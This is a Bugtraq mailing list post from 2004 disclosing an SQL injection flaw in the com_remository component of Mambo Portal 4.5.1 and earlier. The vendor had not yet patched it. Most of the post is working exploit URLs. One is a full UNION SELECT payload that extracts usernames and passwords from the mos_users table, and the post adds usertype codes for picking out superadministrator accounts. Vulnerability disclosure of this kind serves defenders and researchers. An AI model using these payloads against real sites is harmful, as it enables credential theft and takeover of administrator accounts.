Bugtraq mailing list archives
Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL injection Vulnerability.
From: khoaimi <kh0aimi () yahoo com>
Date: 18 Sep 2004 03:39:46 -0000
Vendor www.mamboportal.com Message from vendor : Mambo is one of the most powerful Open Source Content Management Systems on the planet. It is used all over the world for everything from simple websites to complex corporate applications. Mambo is easy to install, simple to manage, and reliable. Bug name : SQL injection Version : lastest Version 4.5.1(1.0.9) and lower. Exploit : http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/* You can exploit from the table "mos_users" with the query below http://www.mambosite.com/index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/* with the values of usertype : 0 = superadministrator 1 = administrator 2 = editor 3 = user 5 = publisher 6 = manager Vendor feedback : Not yet Vendor patch : Not yet khoai www.xfrog.org
Current thread:
- Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL injection Vulnerability. khoaimi (Sep 18)